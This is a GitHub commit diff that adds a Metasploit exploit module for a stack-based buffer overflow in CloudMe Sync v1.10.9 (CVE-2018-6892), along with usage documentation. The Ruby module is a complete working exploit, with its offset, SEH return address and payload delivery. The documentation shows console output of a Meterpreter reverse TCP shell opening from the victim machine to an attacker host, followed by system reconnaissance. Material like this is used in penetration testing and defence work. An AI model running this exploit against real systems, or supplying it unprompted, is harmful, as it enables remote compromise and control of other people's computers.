File tree Expand file tree Collapse file tree 2 files changed +108
-0
lines changed
documentation/modules/exploit/windows/misc
modules/exploits/windows/misc Expand file tree Collapse file tree 2 files changed +108
-0
lines changed Original file line number Diff line number Diff line change 1+ ## Description
2+ This module exploits a buffer overflow vulnerability in [ CloudMe Sync v1.10.9] ( https://www.cloudme.com/downloads/CloudMe_1109.exe ) .
3+
4+ ## Verification Steps
5+ 1 . Install CloudMe for Desktop version ` v1.10.9 `
6+ 2 . Start the applicaton (you don't need to create an account)
7+ 3 . Start ` msfconsole `
8+ 4 . Do ` use exploit/windows/misc/cloudme_sync `
9+ 5 . Do ` set RHOST ip `
10+ 6 . Do ` set LHOST ip `
11+ 7 . Do ` exploit `
12+ 8 . Verify the Meterpreter session is opened
13+
14+ ## Scenarios
15+
16+ ### CloudMe Sync client application on Windows 7 SP1 x86
17+
18+ ```
19+ msf > use exploit/windows/misc/cloudme_sync
20+ msf exploit(windows/misc/cloudme_sync) > set RHOST 172.16.40.148
21+ RHOST => 172.16.40.148
22+ msf exploit(windows/misc/cloudme_sync) > set PAYLOAD windows/meterpreter/reverse_tcp
23+ PAYLOAD => windows/meterpreter/reverse_tcp
24+ msf exploit(windows/misc/cloudme_sync) > set LHOST 172.16.40.5
25+ LHOST => 172.16.40.5
26+ msf exploit(windows/misc/cloudme_sync) > exploit
27+
28+ [*] Started reverse TCP handler on 172.16.40.5:4444
29+ [*] Sending stage (179779 bytes) to 172.16.40.148
30+ [*] Meterpreter session 1 opened (172.16.40.5:4444 -> 172.16.40.148:57185) at 2018-02-19 12:35:21 +0000
31+
32+ meterpreter > sysinfo
33+ Computer : PC
34+ OS : Windows 7 (Build 7601, Service Pack 1).
35+ Architecture : x86
36+ System Language : pt_PT
37+ Domain : WORKGROUP
38+ Logged On Users : 1
39+ Meterpreter : x86/windows
40+ meterpreter >
41+ ```
Original file line number Diff line number Diff line change 1+ ##
2+ # This module requires Metasploit: https://metasploit.com/download
3+ # Current source: https://github.com/rapid7/metasploit-framework
4+ ##
5+
6+ class MetasploitModule < Msf ::Exploit ::Remote
7+ Rank = GreatRanking
8+
9+ include Msf ::Exploit ::Remote ::Tcp
10+ include Msf ::Exploit ::Remote ::Seh
11+
12+ def initialize ( info = { } )
13+ super ( update_info ( info ,
14+ 'Name' => 'CloudMe Sync v1.10.9' ,
15+ 'Description' => %q{
16+ This module exploits a stack-based buffer overflow vulnerability
17+ in CloudMe Sync v1.10.9 client application. This module has been
18+ tested successfully on Windows 7 SP1 x86.
19+ } ,
20+ 'License' => MSF_LICENSE ,
21+ 'Author' =>
22+ [
23+ 'hyp3rlinx' , # Original exploit author
24+ 'Daniel Teixeira' # MSF module author
25+ ] ,
26+ 'References' =>
27+ [
28+ [ 'CVE' , '2018-6892' ] ,
29+ [ 'EDB' , '44027' ] ,
30+ ] ,
31+ 'DefaultOptions' =>
32+ {
33+ 'EXITFUNC' => 'thread'
34+ } ,
35+ 'Platform' => 'win' ,
36+ 'Payload' =>
37+ {
38+ 'BadChars' => "\x00 " ,
39+ } ,
40+ 'Targets' =>
41+ [
42+ [ 'CloudMe Sync v1.10.9' ,
43+ {
44+ 'Offset' => 2232 ,
45+ 'Ret' => 0x61e7b7f6
46+ }
47+ ]
48+ ] ,
49+ 'Privileged' => true ,
50+ 'DisclosureDate' => 'Jan 17 2018' ,
51+ 'DefaultTarget' => 0 ) )
52+
53+ register_options ( [ Opt ::RPORT ( 8888 ) ] )
54+
55+ end
56+
57+ def exploit
58+ connect
59+
60+ buffer = make_nops ( target [ 'Offset' ] )
61+ buffer << generate_seh_record ( target . ret )
62+ buffer << payload . encoded
63+
64+ sock . put ( buffer )
65+ handler
66+ end
67+ end
You can’t perform that action at this time.
0 commit comments